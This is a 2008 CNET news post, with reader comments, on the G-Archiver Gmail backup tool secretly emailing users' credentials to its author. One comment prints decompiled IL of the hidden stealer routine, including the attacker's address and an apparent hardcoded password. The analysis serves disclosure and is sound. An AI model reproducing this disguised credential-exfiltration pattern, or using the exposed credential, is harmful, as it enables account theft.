• On MovieTome: CAPTAIN AMERICA was in THE HULK?!?
March 10, 2008 9:01 AM PDT

E-mail archive program gathers Gmail account information as well

Posted by Robert Vamosi
  • Print

In looking for a program to back up his Gmail account, programmer Dustin Brooks found a commercial program that instead copies username and password information, according to a blog on Codinghorror.com.

Over the weekend, Brooks said in an e-mail to CodingHorrror.com that he was looking for a program that would archive his Gmail account onto his local hard drive. He signed up for a program called G-Archiver distributed by Mate Media of Miami, Fla. Brooks says that after installing the program, it didn't do all he was looking for so he decided to reverse engineer the source code using a program called Reflector for .Net.

Inside the source code Brooks found the program author's e-mail address and account password for Gmail. Thinking that was a little strange, Brooks used the hardcoded information to open John Terry's Gmail account. There, Brooks alleges he found 1,777 messages, all of which had username and passwords for people who signed up for the G-Archiver, including his own. In other words, whenever anyone signed up for the program, as Brooks had, a copy of his or her username and password was sent to John Terry's Gmail account.

Hardcoding e-mail addresses isn't new. In a presentation at Black Hat D.C. 2008 a few weeks ago, researchers Nitesh Dhanjani and Billy Rios reported that phishing site creators frequently hardcode e-mail addresses into the code in order to receive copies of the personal information submitted independent of where the Web form is being sent.

Brooks says upon realizing what each of the e-mails contained, he then deleted all the mail and emptied the trash. He then changed the author's password, and reported jterry79@gmail.com's abuse to Google.

On the CodingHorror.com site this morning, Brooks wrote "Granted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for Google checkout. I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well. The only e-mails in this account were usernames/passwords. This wasn't a personal account used for other things."

A number of sites have since removed G-Archiver from their download collection, including CNET Download.com. Attempts to contact Mate Media have so far gone unanswered.

Originally posted at Defense in Depth
Topics:

Security and spyware

Tags:

security,

Gmail,

G-Archiver,

CodingHorror.com,

Dustin Brooks,

John Terry,

Mate Media,

username,

password

Bookmark:
Digg
Del.icio.us
Reddit
Recent posts from Webware
Music and browsing take flight in Songbird
BlackBerry's mobile Web site gets a refresh
Zagat on iPhone: 'A disappointment' die-hards will still 'love'
Facebook Marketplace relaunch powered by Oodle
Gmail comes to the desktop in gadget form
Add a Comment (Log in or register) 11 comments
Is this true?
by Mugunth March 10, 2008 11:33 AM PDT
All I could find in GArchiver.exe, CheckConnection method was

.method private hidebysig instance void CheckConnection() cil managed
{
// Code size 30 (0x1e)
.maxstack 2
.locals init (class [mscorlib]System.Exception V_0)
IL_0000: nop
.try
{
IL_0001: nop
IL_0002: ldarg.0
IL_0003: ldfld string GMail_Archiver.PopMail::userName
IL_0008: ldarg.0
IL_0009: ldfld string GMail_Archiver.PopMail::password
IL_000e: call void [SM]SM.Mail::CheckConnection(string,
string)
IL_0013: nop
IL_0014: nop
IL_0015: leave.s IL_001c
} // end .try
catch [mscorlib]System.Exception
{
IL_0017: stloc.0
IL_0018: nop
IL_0019: nop
IL_001a: leave.s IL_001c
} // end handler
IL_001c: nop
IL_001d: ret
} // end of method PopMail::CheckConnection



there isn't any code to steal personal data here... Am I missing something?
Reply to this comment
Oh No...! I'm wrong...
by Mugunth March 10, 2008 11:36 AM PDT
There is this file... sm.dll
Which is the real stealer...

.method public hidebysig static void CheckConnection(string a,
string b) cil managed
{
// Code size 224 (0xe0)
.maxstack 5
.locals init (class [System]System.Net.Mail.MailMessage V_0,
class [System]System.Net.Mail.SmtpClient V_1,
class [mscorlib]System.Exception V_2)
IL_0000: nop
.try
{
IL_0001: nop
IL_0002: newobj instance void [System]System.Net.Mail.MailMessage::.ctor()
IL_0007: stloc.0
IL_0008: ldloc.0
IL_0009: callvirt instance class [System]System.Net.Mail.MailAddressCollection [System]System.Net.Mail.MailMessage::get_To()
IL_000e: ldstr "JTerry79@gmail.com"
IL_0013: callvirt instance void [System]System.Net.Mail.MailAddressCollection::Add(string)
IL_0018: nop
IL_0019: ldloc.0
IL_001a: ldstr "JTerry79@gmail.com"
IL_001f: ldstr "JTerry"
IL_0024: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_0029: newobj instance void [System]System.Net.Mail.MailAddress::.ctor(string,
string,
class [mscorlib]System.Text.Encoding)
IL_002e: callvirt instance void [System]System.Net.Mail.MailMessage::set_From(class [System]System.Net.Mail.MailAddress)
IL_0033: nop
IL_0034: ldloc.0
IL_0035: ldstr "Account"
IL_003a: callvirt instance void [System]System.Net.Mail.MailMessage::set_Subject(string)
IL_003f: nop
IL_0040: ldloc.0
IL_0041: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_0046: callvirt instance void [System]System.Net.Mail.MailMessage::set_SubjectEncoding(class [mscorlib]System.Text.Encoding)
IL_004b: nop
IL_004c: ldloc.0
IL_004d: ldstr "Username: "
IL_0052: ldarg.0
IL_0053: call string [mscorlib]System.String::Concat(string,
string)
IL_0058: callvirt instance void [System]System.Net.Mail.MailMessage::set_Body(string)
IL_005d: nop
IL_005e: ldloc.0
IL_005f: dup
IL_0060: callvirt instance string [System]System.Net.Mail.MailMessage::get_Body()
IL_0065: ldstr "\r\nPassword: "
IL_006a: ldarg.1
IL_006b: call string [mscorlib]System.String::Concat(string,
string,
string)
IL_0070: callvirt instance void [System]System.Net.Mail.MailMessage::set_Body(string)
IL_0075: nop
IL_0076: ldloc.0
IL_0077: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
IL_007c: callvirt instance void [System]System.Net.Mail.MailMessage::set_BodyEncoding(class [mscorlib]System.Text.Encoding)
IL_0081: nop
IL_0082: ldloc.0
IL_0083: ldc.i4.0
IL_0084: callvirt instance void [System]System.Net.Mail.MailMessage::set_IsBodyHtml(bool)
IL_0089: nop
IL_008a: ldloc.0
IL_008b: ldc.i4.2
IL_008c: callvirt instance void [System]System.Net.Mail.MailMessage::set_Priority(valuetype [System]System.Net.Mail.MailPriority)
IL_0091: nop
IL_0092: newobj instance void [System]System.Net.Mail.SmtpClient::.ctor()
IL_0097: stloc.1
IL_0098: ldloc.1
IL_0099: ldstr "JTerry79@gmail.com"
IL_009e: ldstr "bilal482"
IL_00a3: newobj instance void [System]System.Net.NetworkCredential::.ctor(string,
string)
IL_00a8: callvirt instance void [System]System.Net.Mail.SmtpClient::set_Credentials(class [System]System.Net.ICredentialsByHost)
IL_00ad: nop
IL_00ae: ldloc.1
IL_00af: ldc.i4 0x24b
IL_00b4: callvirt instance void [System]System.Net.Mail.SmtpClient::set_Port(int32)
IL_00b9: nop
IL_00ba: ldloc.1
IL_00bb: ldstr "smtp.gmail.com"
IL_00c0: callvirt instance void [System]System.Net.Mail.SmtpClient::set_Host(string)
IL_00c5: nop
IL_00c6: ldloc.1
IL_00c7: ldc.i4.1
IL_00c8: callvirt instance void [System]System.Net.Mail.SmtpClient::set_EnableSsl(bool)
IL_00cd: nop
IL_00ce: ldloc.1
IL_00cf: ldloc.0
IL_00d0: callvirt instance void [System]System.Net.Mail.SmtpClient::Send(class [System]System.Net.Mail.MailMessage)
IL_00d5: nop
IL_00d6: nop
IL_00d7: leave.s IL_00de
} // end .try
catch [mscorlib]System.Exception
{
IL_00d9: stloc.2
IL_00da: nop
IL_00db: nop
IL_00dc: leave.s IL_00de
} // end handler
IL_00de: nop
IL_00df: ret
} // end of method Mail::CheckConnection



Steals user's information and posts them to jterry79.
Reply to this comment
Great! Now you have violated the DMCA
by basraw March 10, 2008 12:07 PM PDT
You are also to be branded as a hacker.

I just hope the feds don't catch you.
View reply
Just use any POP3 client as an archiver
by Pixelslave March 10, 2008 11:47 AM PDT
Any POP3 client can be used as an archiver for Gmail. It may be overkilled, but there are a lot of free POP3 clients and many of them are from well recognized companies/organization.
Reply to this comment
DMCA VIOLATION -Dustin Brooks = HACKER
by basraw March 10, 2008 12:05 PM PDT
DMCA violated several things here.

1) Breaking into John Terry's EMAIL account. (illegal)

2) REVERSING copyrighted source code ( a violation of the DMCA ).

Throw Dustin Brooks in jail. He's violated the law.
Reply to this comment
RE
by unknown unknown March 10, 2008 2:32 PM PDT
"Breaking into John Terry's EMAIL account. (illegal)"

That's not covered by the DMCA, but it is probably illegal. Though so it harvesting peoples account information without telling them. That makes G-Archiver technically a trojan.

"REVERSING copyrighted source code ( a violation of the DMCA )."

Reverse engineering may violate the license, but it's not necessarily illegal. In fact quite the opposite, it's often perfectly legal as long as software was obtained legitimately. As far as the DMCA goes, it would only break that if he broke copy protection to use Reflector on it.
by shartley123 May 22, 2008 4:46 PM PDT
so your telling me that it is OK for some jack A*S to Steal your information? this really sounds like your the JACKA*S. If this guy is stealing information(which more then likely is your stuff too) then what else is he doing. the DCMA should never come into play when the guy is stealing information with the use of a program. I hope the guy that is doing it goes to jail, and dustin Brooks, congrats on catching the idiot!!! If the dudes e-mail and password is available in a program, then shame on him and no it isn't illegal, because it is out there for others to get. and BTW do you know your wifes/husbands/boyfriends/girlfriends/ daughters/sons passwords for their e-mails or accounts? if you do you are breaking the law according to you!
Username AND Password
by blsith March 10, 2008 1:10 PM PDT
Anyone else find it odd (and sad) that the guy left the username and the password in the code, instead of just having the script email him the information?
Reply to this comment
Why name AND password
by amadensor March 10, 2008 1:20 PM PDT
It had the name and password so that it could use Google's SMTP server. I guess it could have tried to find which SMTP server was already set up for something else, but if they are using only webmail, they may not have anything.

This is yet another definitive argument against running software to which you do not have the source.
Name and Password
by Mugunth March 10, 2008 7:47 PM PDT
Google's SMTP server requires you to authenticate yourself with a name and password, before sending any email from that account. The function CheckConnection does precisely that.

Mugunth
Reply to this comment
advertisement
Click Here

About Webware

Say No to boxed software! The future of applications is online delivery and access. Software is passé. Webware is the new way to get things done.

Add this feed to your online news reader

Webware topics

In the news now

A tech veteran responds to the recession

LogLogic's Patricia Sueltz heard a clear message about the economy from investors, but she already knows a thing or two about navigating through tough times.


Obama's AG pick on privacy

Eric Holder has criticized the warrantless wiretapping program, but his views on other online policies may not be that far from those of the Bush administration.


advertisement
Click Here

Inside CNET News

Scroll Left Scroll Right

  • Business Tech

    IPOs a thing of the past?

    At AlwaysOn Venture Summit West conference, investment bankers, venture capitalists, and private equity players weigh in on the prognosis for the IPO market.

  • Gallery

    Photos: Space station marks a decade aloft

    The first pieces of the International Space Station went into orbit 10 years ago. Now a full-fledged lab facility, it continues to grow.

  • Security

    Apple deletes Mac antivirus suggestion

    Apple removes statement to customers urging them to use antivirus software, saying that Macs are safe "out of the box."

  • Beyond Binary

    Microsoft expands Vista SP2 testing

    Starting on Thursday, the software maker will make public a test version of the service pack update to Vista.

  • Video

    A toast to online wine A toast to online wine

  • Digital Media

    EFF, Bush administration spar over telecom immunity

    Feds tell district judge government must be allowed to protect the heartland. EFF says that is fine, but don't strip away constitutional rights.

  • Video

    Wi-Fi while you fly Wi-Fi while you fly

  • Gaming and Culture

    From Cy Young to video game fame

    Tim Lincecum, one of the best pitchers in baseball, was chosen to be the cover athlete for 2K Sports' next baseball game. On Tuesday, he did a motion-capture session for the game.

  • Green Tech

    Ta ta, Tesla

    Are the Valley-based VCs and big-wigs who back Tesla Motors really serious about asking the federal government for low-interest loans?

  • Gallery

    Photos: Top-rated reviews of the week

    Here are a few of CNET Reviews' favorite items from the past week, including Adobe suites, laptop bags, and a Panasonic flat panel TV.

  • The Download Blog

    Music and browsing take flight in Songbird

    Music and browsing mashup Songbird has kicked the remnants of its shell to the curb, and the program's main emphasis as a music browser couldn't be more clear.

  • Green Tech

    Ford accelerates electric-vehicle plans

    In its turnaround plan presented to Congress, Ford says it will invest billions in fuel efficiency and introduce a family of hybrid-electric and all-electric cars.

News
Latest news
Business tech
Green tech
Wireless
Security
Media
Popular topics
Apple iPhone
Apple iPod
CES
Cell phones
Dell
GPS
CNET sites
CNET Site map
CNET TV
Downloads
News
Reviews
Shopper.com
More information
Newsletters
Corrections
Customer Help Center
RSS
What's new
About CNET